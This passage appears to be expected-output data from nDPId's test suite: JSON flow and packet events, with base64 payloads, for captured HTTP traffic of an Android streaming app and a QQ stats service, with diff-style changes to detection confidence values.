gDciKAgquyBeeCfCgrh3guvHmXX9Fv4rdnUCybBT6ToIUzCEdDKdf5+qXz3neT2fH6w3YXOzPnh+sL5JqazXB88ONsuLgh9fXB08J6OVdJrYPzvIYRMOnv\/084Nlxi+eHVyGi4L3ffvbv3735V\/wtqvVelOu8aeG\/yKeHSzXi4D\/XcP5uuDVRTgri6uweYX3vdpsrp6fHp8eXy3TEb3+9ObyKK0uTo\/fLHNZLV6HS\/w7Pb59y\/r0+Lqcl7Au+I49nR5rL2QXWHAIKpoiZWDJKmpvDRGzcMpaOvrZ1Rk+13XZLC\/D4v8jvrwKeWppMiEI8ilFp4TTOrKw1gjnrDdkndmuO50v0+vFzfU5Lvb1zeXuem8v5VFcnvW39P61T\/cu7w8OF8vLRbi6OvnfvThc3ORlPikmxyxF7CTUO6Wi6rzV1BlJpFyQJRd\/uHhzwkfuiI\/oELc7vcZtP8HNPVqncll+Hj47Gv7kxSqX85N1fr04u3q1uiyLT505XKzenBDeGa\/DZT75yWp1dl4OF\/j+erXExcwn0Rd2WLLUKrP2+OVZwI91SCaIWjuXyXXKxtQFL7hjR5yqSKypHG5Odky7nvVrfLzF5rMroExvn23h1qYRuuL0GB+bOwFgiwvs8HwZxaIkQ7m4qCzWYKpugu5I8SnR3UkrbVKsjq3VNjuncRWSsdlQLeyz3BPdrcyM0VW6DbnOw+iSVR3l7IurMgBfp4XwFCmbYAVTAc2pBbljxSckdyftTNYSa\/TeWoEnNVjy0ojINeT+1X7kDjIzJpcEfIwG\/gIRrEJnqIfTKqtM4lh9imQrvlDBS1jkBtiOEn6ILDan+zv4B27ft6IknRBzROnlsINj\/966p\/\/54z\/e\/fpXj7inLFr5p+b0WFlBXSGVhXKUXI2wloqt1yFGuGkpB84tmGM\/UvwhdzvQRvvlg7QMVHUMmfDM+aQUQoj+6dOqKCOUUvuZymGFHz\/f\/n3+qbNNLCV7bPIgV3VaELznnEJKglOSoSonZcpUsuXgagNrOVp8SnKHdVchVBBS2KCrd5KTyMJh3SWT0DIPbvl9uzwmstrKzJncVoGVuyVXdrhfNXOMOinY2upzciVKn4VU3qnUxuaOFJ+S3EHaah10ccXaKr0UQiL\/YaV12HZ0SWF4Yp9K7lZmzuS6RjZX35IrOhaZTZIccyUVkddxqoSQk0JYVZIKTWzuSPEpyR2kvRMxJa6pwj2w2iM9g4xjikkJhFe0r7ewlZkzudyIXHtLLnfZKgqOmWqNiK8QXLlAJgebKnIC3CYPO1J8SnIHaR9sjBmuEhlKwnukQLXOpFKfDxA07DVPtblbmTmSu4vjSN4Fcn\/+w+OBHNk2ToUUt7seyU5lVbSKpXBkDZNUkedGnjaTtARPcXALpyw0jBafDvA76QRbLIRR2URVWcsiatEmC+0KB2H9XoHcTmaOgG8LDb4VubehOInOcVLMRlXZx3MmpeSMo1itTSpF04bckeJTkjtIB5uly4hdLb5jV+BQ2KicqLGyCn7Ykp5mmqXYysyZ3DYpCITevVNBSJ5FFBJJWVM0\/EASyhZlHWIaYcGzKw3c4dHiU5I7rNvYSCIwV8lGiByV1CZEKkpaVZBB3NPmbmXmSO7OqYA\/PCSH\/\/TPd\/\/6+pHkMBk4Hg2KEVIy+HZedZH6xEQmhHs+CoEami5VoJ0hoapWaKgnTepTjBWfkO+dNMskVF81833ngsqOnUBumFDHj8WGuB\/fg8wc+d76FA6tOU3IRdsNyEWKzUvFQYpiQkLMpxKKaUJTRZMFRfDbwjLLkeJTkjtIhwCzHBDb1pJ1qOi1KeQsHCqKtlIadqQn+hTDCmdMrm3TuyAlCsAgl7qAKhQ49UEoklGQYrxGkgIFfckiDI1T09rckeJTkjtIV1ctkmpJo9PIuEQiG4tHFYFd8VkZt6fN3crMkdw7nwLF5KEh8puv\/v3FV486FY0qzgp3oJPwKjxSb2xICYocjGarUYqNpRqnWoR6PEb4Idi4RPeN5a7w\/D0Nir0owSvmOQK361BsVI4wqFF2kbNURGBHBOvJes8AyGr0mMJoWNFgh+cxwpOh1IuiWYbsnFEybRxGtr1Vcja6gIyhYC7BRYFSgTAeyVMuse8rb4HSGOGHKO3M0Af1v7xaXZQXaG\/+ZFMu1j9eXb\/ou5gBlaHukxc\/\/FHnInxFL7LUVqCnQEcn0E1gScmCH5XHtt7dB\/geO9gvk6SRas7w6jZNg2zh9XdwEgO2T8HIQVlGhBqwqwZjbCi+km5Skh0j\/BDeJ26pvShmPFjPEaWdD0dgaUgMffn1d3\/7xWM+nG6UGDIKwAUk+BKaBqOrTFKwR9NRyDZZGAt0Yw1p60kDlDHCUwEne1Ficn6OwA0+nGuFEnoeULeTyDEilRxLVD57YauXmuHs1KwULBkK9Q02X2lGik+H1FZ4zkRp1Sb3Z1DwwuOKFAqaQRNcmegBGJrpk65SYv5MUULLjrQttkQ5Wn06poZ1zxGq3b6IUt92W3z3my++\/ebR1IZok7tT3D\/V1mCIz5OUqmCEQ7IUMjMabZDKwxevK5mhbjDl1jha\/CF3O1\/+g4KJuyHXO+kQTES8hCfNx5or2jAQQChMWVqHSpEfAqj7iZQPb0neyXz8fL9\/2FO0acLAuMcturIrSnj0CsWig0PaOWDSMaGbCH3mcO3QRdRgGx4tPiW6w7o1C0zdpoxuIU7FGFcVWczAlISqNschI\/lUdLcyc0aX2ySUURe5Rdd2psaIYi1hnqxmJGzQoqtDCV5plBHyzvpMa3VHik+J7iCNwY8UseMYjCcn5NMxZh5SyTWghYoxtrx9ZJ+K7lZmzuiqNllHxWjahMOgu4SjAHAoBOIeRVribAj0z9RK8Fd1tlHkJlZ3pPiU6A7S2XqXhNUYBUTBr2YhHDwkHTX5mLDn7InuVmaO6O4cYr7rIHr399+9++XvH0kUsWpToZG6nyLzznTwHVDmY19Q1U0BhW30JODe4wCUhG4aNXiGU9rm0eLTAX4njYFadN33z3HJ8P6VZrQkw1y7EByFPd2KnczHD\/h7x0vJN2rulLfoYjIaOU6HOVNM5MGxwN6KUxUURtdQGUJ7stMtbLMcKz4hunfSyWj0Csn+zAFPWLFChtdK+Fg4VQOnaOxlm3crnDG6rNsMO0kpb3uIcKxQKDjrBFW3IkvyyHiZWjN2W0xfBoUzmRq4FaPFp0R3WLfxxohqskQ1QpBkbyUOm6o4CgbRHKZO90R3KzNHdF++ffn2v6mfUJ+ITQAADQowDQoNCg=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129449,"flow_last_seen":1654385129449,"flow_idle_time":7580000,"flow_min_l4_payload_len":916,"flow_max_l4_payload_len":916,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":916,"midstream":1,"thread_ts_msec":1654385129449,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1654385129449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":982,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":982,"pkt_l4_len":948,"thread_ts_msec":1654385129449,"pkt":"tKXvZygQnLbQ0+MzCABFAAPIWPdAAEAGbIDAqAJ+oXUNHbioAFBarhYgKPds64AYAfZ1cwAAAQEICrrF6hOXEOt4R0VUIC9hcGkvbWVzc2FnZXMvbGlzdEZvcllpbmdzaGk\/Y2xpZW50LXVpZD1lNmRiZDMwYi0zYjg0LTQ0YjQtOTc1MS02MzExNDhhM2VkZTkmbWluX2lkPTAmYWNjZXNzX3Rva2VuPSZfYnJhbmQ9R29vZ2xlJl9tb2RlbD1zZGtfZ3Bob25lX3g4NiZfb3Y9QW5kcm9pZDExJl9jcHU9aTY4NiZfcmVzb2x1dGlvbj0xMDgwJTJDMTc5NCZfcGFja2FnZT1jb20uc2NlbmV3YXkua2Fua2FuJl92PTIuOC4yLjEmX2NoYW5uZWw9MWt4dW4mX2NhcnJpZXI9MzEwMjYwJl9hbmRyb2lkX2lkPWI5ZTI4Nzc2MzU0ZDI1OWUmX25ldHdvcms9d2lmaSZfYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZfdWRpZD1lNmRiZDMwYi0zYjg0LTQ0YjQtOTc1MS02MzExNDhhM2VkZTkmJl9jb3VudHJ5PVVTJl9sb2NhbGU9ZW4mXz0xNjU0Mzg1MTI1IEhUVFAvMS4xDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ2xpZW50LUJyYW5kOiBHb29nbGUNCkNsaWVudC1EZXZpY2U6IHNka19ncGhvbmVfeDg2DQpDbGllbnQtT3M6IEFuZHJvaWQxMQ0KQ2xpZW50LUNwdTogaTY4Ng0KQ2xpZW50LVJlc29sdXRpb246IDEwODAsMTc5NA0KQ2xpZW50LVBhY2thZ2U6IGNvbS5zY2VuZXdheS5rYW5rYW4NCkNsaWVudC1WZXJzaW9uOiAyLjguMi4xDQpDbGllbnQtU291cmNlOiAxa3h1bg0KQ2xpZW50LVNpbTogMzEwMjYwDQpDbGllbnQtQW5kcm9pZElkOiBiOWUyODc3NjM1NGQyNTllDQpDbGllbnQtQ291bnRyeTogVVMNCkNsaWVudC1MYW5ndWFnZTogZW4NCkNsaWVudC1VaWQ6IGU2ZGJkMzBiLTNiODQtNDRiNC05NzUxLTYzMTE0OGEzZWRlOQ0KSG9zdDogbWVzc2FnZXMuMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -01196{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129449,"flow_last_seen":1654385129449,"flow_idle_time":7580000,"flow_min_l4_payload_len":916,"flow_max_l4_payload_len":916,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":916,"midstream":1,"thread_ts_msec":1654385129449,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47272,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"messages.1kxun.mobi","url":"messages.1kxun.mobi\/api\/messages\/listForYingshi?client-uid=e6dbd30b-3b84-44b4-9751-631148a3ede9&min_id=0&access_token=&_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +01196{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129449,"flow_last_seen":1654385129449,"flow_idle_time":7580000,"flow_min_l4_payload_len":916,"flow_max_l4_payload_len":916,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":916,"midstream":1,"thread_ts_msec":1654385129449,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47272,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"messages.1kxun.mobi","url":"messages.1kxun.mobi\/api\/messages\/listForYingshi?client-uid=e6dbd30b-3b84-44b4-9751-631148a3ede9&min_id=0&access_token=&_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129508,"flow_last_seen":1654385129508,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1654385129508,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.45.78.184","src_port":38834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1654385129508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1654385129508,"pkt":"tKXvZygQnLbQ0+MzCABFAADLA6ZAAEAGrXvAqAJ+dy1OuJeyAFCIwHUyTW4UsYAYAfaJyQAAAQEIChuIhYJcXfQQUE9TVCAvbXN0YXQvcmVwb3J0IEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtRW5jb2Rpbmc6IHJjNCxnemlwDQpDb250ZW50LUxlbmd0aDogMzcyDQpIb3N0OiBwaW5nbWEucXEuY29tOjgwDQoNCg=="} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129508,"flow_last_seen":1654385129508,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1654385129508,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.45.78.184","src_port":38834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"pingma.qq.com","url":"pingma.qq.com:80\/mstat\/report","code":0,"content_type":"","user_agent":""}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129508,"flow_last_seen":1654385129508,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1654385129508,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.45.78.184","src_port":38834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"pingma.qq.com","url":"pingma.qq.com:80\/mstat\/report","code":0,"content_type":"","user_agent":""}} 00977{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1654385129508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":438,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":438,"pkt_l4_len":404,"thread_ts_msec":1654385129508,"pkt":"tKXvZygQnLbQ0+MzCABFAAGoA6dAAEAGrJ3AqAJ+dy1OuJeyAFCIwHXJTW4UsYAYAfaKpgAAAQEIChuIhYJcXfQQvRp0nw2ppXcC6yOw46wWgZzMy5FDJc4R5x6BDvjQ0wxoIXOGGYQ9NS8mc0GI8mV5B6RUdKOLLdyHMcd5TKKRXV6aUAhvfafdmP9+u1yyjoRBy\/Z4bsFO7z02iRFLaH+SssfPgku6BHrhNyeN5ALqOtKCwJWbgUqSjfxmV66Ayi6ArLH8ZRPEtkaOldzuHxhCZGsPLMj5lrpyCpBI\/hUytCRoVcL0dV\/QMO9SGuGNRi\/Ajkx3OZ7jw+iay1fvfajHKHxaFFiqQlP4ANAhjlwtkM1OWi\/Lk793\/2aCcJrjC4nFMTygSlSKmAIRkl+GU\/C069CZkcxT7jNFgtHFhmyXeOpqOHfhmo5N6mRINDfZIpwZkvTBUx608nxLnt\/BZ2XZomwSj9Suk4o\/lo2Z3vv3fPwkT6XztXus\/ExbD+p\/KI22uH8Uy5Ts4RpU6bqEMdXSPj2ssPfM+MX2Gy9aMgXGqKVNStu3vu3sFQ4t38e4RiEZp59c"} 00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1654385129804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1654385129804,"pkt":"nLbQ0+MztKXvZygQCABFAAE9gOBAADQGUyKhdQ0dwKgCfgBQuKgo92zrWq4ZtIAYAPE2OQAAAQEICpcQ7Dm6xeoTSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNToyOSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC94bWw7IGNoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpYLVBvd2VyZWQtQnk6IFBIUC83LjEuMTcNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCg0KMWQNCh+LCAAAAAAAAAOzKcrPL7Gz0QdTANPi2TQNAAAADQowDQoNCg=="} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":3,"flow_last_seen":1654385129813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1654385129813,"pkt":"nLbQ0+MztKXvZygQCABFAACc4O9AACsG5WB3LU64wKgCfgBQl7JNbhSxiMB3PYAYACHQkAAAAQEIClxd9FwbiIWCSFRUUC8xLjAgNDA0IE5vdCBGb3VuZA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1MZW5ndGg6IDM0DQoNCnsicmV0IjotMSwgIm1zZyI6ImludmFsaWQgYXBwa2V5In0="} 01619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1654385129990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":926,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":926,"pkt_l4_len":892,"thread_ts_msec":1654385129990,"pkt":"tKXvZygQnLbQ0+MzCABFAAOQVoNAAEAGbyzAqAJ+oXUNHbiOAFDYbwIrIGDngYAYAfV1OwAAAQEICrrF7C+XEOppR0VUIC92aWRlb19rYW5rYW5fdGFncy92Mi9hcGkvdmlkZW9zL2NoYW5uZWxzLmpzb24\/X2JyYW5kPUdvb2dsZSZfbW9kZWw9c2RrX2dwaG9uZV94ODYmX292PUFuZHJvaWQxMSZfY3B1PWk2ODYmX3Jlc29sdXRpb249MTA4MCUyQzE3OTQmX3BhY2thZ2U9Y29tLnNjZW5ld2F5LmthbmthbiZfdj0yLjguMi4xJl9jaGFubmVsPTFreHVuJl9jYXJyaWVyPTMxMDI2MCZfYW5kcm9pZF9pZD1iOWUyODc3NjM1NGQyNTllJl9uZXR3b3JrPXdpZmkmX2FpZD01YWM2YTBmZi04ZDE4LTQ3YmMtYTkwMi0yODEyY2YwYzI1MWUmX3VkaWQ9ZTZkYmQzMGItM2I4NC00NGI0LTk3NTEtNjMxMTQ4YTNlZGU5JiZfY291bnRyeT1VUyZfbG9jYWxlPWVuJl89MTY1NDM4NTEyNyBIVFRQLzEuMQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNsaWVudC1CcmFuZDogR29vZ2xlDQpDbGllbnQtRGV2aWNlOiBzZGtfZ3Bob25lX3g4Ng0KQ2xpZW50LU9zOiBBbmRyb2lkMTENCkNsaWVudC1DcHU6IGk2ODYNCkNsaWVudC1SZXNvbHV0aW9uOiAxMDgwLDE3OTQNCkNsaWVudC1QYWNrYWdlOiBjb20uc2NlbmV3YXkua2Fua2FuDQpDbGllbnQtVmVyc2lvbjogMi44LjIuMQ0KQ2xpZW50LVNvdXJjZTogMWt4dW4NCkNsaWVudC1TaW06IDMxMDI2MA0KQ2xpZW50LUFuZHJvaWRJZDogYjllMjg3NzYzNTRkMjU5ZQ0KQ2xpZW50LUNvdW50cnk6IFVTDQpDbGllbnQtTGFuZ3VhZ2U6IGVuDQpDbGllbnQtVWlkOiBlNmRiZDMwYi0zYjg0LTQ0YjQtOTc1MS02MzExNDhhM2VkZTkNCkhvc3Q6IGthbmthbi4xa3h1bi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogb2todHRwLzMuMTAuMA0KDQo="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385131029,"flow_last_seen":1654385131029,"flow_idle_time":7580000,"flow_min_l4_payload_len":202,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1654385131029,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":60148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1654385131029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1654385131029,"pkt":"tKXvZygQnLbQ0+MzCABFAAD+y9xAAEAGhTvAqAJ+rGl5Uur0AFBJWQVPCSiD6YAYAfbp0gAAAQEICvK1BpnJoboZR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL2ljb25zLzUtMzI4ZTNjZGYyNDRjMDAzZGYwODc1NGNjYTA1ZmJjMmYucG5nIEhUVFAvMS4xDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KSG9zdDogcGljLjFreHVuLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385131029,"flow_last_seen":1654385131029,"flow_idle_time":7580000,"flow_min_l4_payload_len":202,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1654385131029,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":60148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/icons\/5-328e3cdf244c003df08754cca05fbc2f.png","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385131029,"flow_last_seen":1654385131029,"flow_idle_time":7580000,"flow_min_l4_payload_len":202,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1654385131029,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":60148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/icons\/5-328e3cdf244c003df08754cca05fbc2f.png","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":1654385131335,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":384,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":384,"pkt_l4_len":350,"thread_ts_msec":1654385131335,"pkt":"nLbQ0+MztKXvZygQCABFAAFyOPxAADYGIaisaXlSwKgCfgBQ6vQJKIPpSVkGGYAYAOt1NwAAAQEICsmhuxLytQaZSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTozMSBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nDQpDb250ZW50LUxlbmd0aDogNjIzMg0KTGFzdC1Nb2RpZmllZDogRnJpLCAyMiBKdW4gMjAxOCAwMjoxNzo1NSBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkVUYWc6ICI1YjJjNWM1My0xODU4Ig0KRXhwaXJlczogRnJpLCAwMiBTZXAgMjAyMiAyMzoyNTozMSBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9Nzc3NjAwMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0K"} 08901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1654385131340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":6298,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":6298,"pkt_l4_len":6264,"thread_ts_msec":1654385131340,"pkt":"nLbQ0+MztKXvZygQCABFABiMOP1AADYGCo2saXlSwKgCfgBQ6vQJKIUnSVkGGYAYAOsBYQAAAQEICsmhuxLytQaZiVBORw0KGgoAAAANSUhEUgAAADAAAAAsCAYAAAAjFjtnAAAACXBIWXMAAAsTAAALEwEAmpwYAAAKTWlDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVN3WJP3Fj7f92UPVkLY8LGXbIEAIiOsCMgQWaIQkgBhhBASQMWFiApWFBURnEhVxILVCkidiOKgKLhnQYqIWotVXDjuH9yntX167+3t+9f7vOec5\/zOec8PgBESJpHmomoAOVKFPDrYH49PSMTJvYACFUjgBCAQ5svCZwXFAADwA3l4fnSwP\/wBr28AAgBw1S4kEsfh\/4O6UCZXACCRAOAiEucLAZBSAMguVMgUAMgYALBTs2QKAJQAAGx5fEIiAKoNAOz0ST4FANipk9wXANiiHKkIAI0BAJkoRyQCQLsAYFWBUiwCwMIAoKxAIi4EwK4BgFm2MkcCgL0FAHaOWJAPQGAAgJlCLMwAIDgCAEMeE80DIEwDoDDSv+CpX3CFuEgBAMDLlc2XS9IzFLiV0Bp38vDg4iHiwmyxQmEXKRBmCeQinJebIxNI5wNMzgwAABr50cH+OD+Q5+bk4eZm52zv9MWi\/mvwbyI+IfHf\/ryMAgQAEE7P79pf5eXWA3DHAbB1v2upWwDaVgBo3\/ldM9sJoFoK0Hr5i3k4\/EAenqFQyDwdHAoLC+0lYqG9MOOLPv8z4W\/gi372\/EAe\/tt68ABxmkCZrcCjg\/1xYW52rlKO58sEQjFu9+cj\/seFf\/2OKdHiNLFcLBWK8ViJuFAiTcd5uVKRRCHJleIS6X8y8R+W\/QmTdw0ArIZPwE62B7XLbMB+7gECiw5Y0nYAQH7zLYwaC5EAEGc0Mnn3AACTv\/mPQCsBAM2XpOMAALzoGFyolBdMxggAAESggSqwQQcMwRSswA6cwR28wBcCYQZEQAwkwDwQQgbkgBwKoRiWQRlUwDrYBLWwAxqgEZrhELTBMTgN5+ASXIHrcBcGYBiewhi8hgkEQcgIE2EhOogRYo7YIs4IF5mOB